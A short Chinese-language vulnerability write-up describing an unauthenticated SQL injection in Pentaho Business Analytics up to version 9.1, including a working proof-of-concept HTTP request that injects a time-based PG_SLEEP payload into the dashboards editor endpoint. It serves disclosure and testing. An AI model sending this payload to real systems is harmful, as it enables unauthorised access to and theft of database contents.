本文共 865 字，大约阅读时间需要 2 分钟。

Pentaho 业务分析平台 SQL 注入漏洞分析

产品简介

Pentaho Business Analytics 是一款专注于大数据资产管理的业务分析平台，旨在帮助用户安全地访问、集成、操作、可视化和分析数据资产。

漏洞概述

Pentaho 业务分析平台已知存在一处严重的 SQL 注入漏洞，具体位置位于 /pentaho/api/repos/dashboards/editor 路径的查询参数中。攻击者可通过这一漏洞未经授权执行任意 SQL 语句，可能导致数据泄露、账号密码获取等安全风险。

影响范围

该漏洞影响 Pentaho 业务分析平台版本 <= 9.1，已知存在的安全隐患可能对企业数据安全造成严重威胁。

漏洞复现环境

建议在以下环境中进行漏洞复现：

• 目标系统：Pentaho 用户控制台

漏洞复现

以下 Proof of Concept (PoC) 代码展示了如何利用该漏洞：

GET /pentaho/api/repos/dashboards/editor?command=executeQuery&datasource=pentaho_operations_mart&require-cfg.js&query=%3BSELECT+PG_SLEEP%288%29-- HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15.7) AppleWebKit 605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari 605.1.15

此 PoC 通过构造特定 SQL 语句，利用 PG_SLEEP 函数实现注入，导致系统响应延迟。攻击者可进一步利用该漏洞获取敏感信息或控制系统。

复现注意事项

• 建议在安全测试环境中进行漏洞复现，避免对生产环境造成影响。
• 配置好防火墙和入侵检测系统，监控异常流量。

通过以上内容，可以全面了解该 SQL 注入漏洞的性质、复现方法及其潜在风险。